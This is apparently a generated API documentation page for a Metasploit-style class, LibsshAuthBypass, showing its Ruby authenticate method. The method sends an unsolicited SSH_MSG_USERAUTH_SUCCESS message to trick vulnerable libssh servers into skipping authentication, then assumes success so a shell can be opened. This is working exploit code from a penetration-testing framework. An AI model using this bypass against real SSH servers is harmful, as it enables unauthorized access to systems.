Class: Net::SSH::Authentication::Methods::LibsshAuthBypass

Inherits:
Abstract
  • Object
show all
Defined in:
lib/msf/core/exploit/remote/ssh/auth_methods/libssh_auth_bypass.rb

Overview

tools.ietf.org/rfc/rfc4252.txt

Instance Method Summary collapse

Instance Method Details

#authenticate(service_name, username, password = nil) ⇒ Object 



11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 
# File 'lib/msf/core/exploit/remote/ssh/auth_methods/libssh_auth_bypass.rb', line 11

def authenticate(service_name, username, password = nil)
  debug { 'Sending SSH_MSG_USERAUTH_SUCCESS' }

  # USERAUTH_SUCCESS is OOB and elicits no reply
  send_message(Net::SSH::Buffer.from(
=begin
    byte      SSH_MSG_USERAUTH_SUCCESS
=end
    :byte, USERAUTH_SUCCESS
  ))

  # We can't fingerprint or otherwise reduce false positives using a session
  # channel open, since most implementations I've seen support only one
  # session channel and don't support channel closing, so this would block
  # us from getting a shell
  #
  # Secondly, libssh doesn't send a CHANNEL_OPEN_FAILURE when we're not
  # authed, so we have to wait for a timeout on CHANNEL_OPEN to return false

  # So assume we succeeded until we can verify
  true
end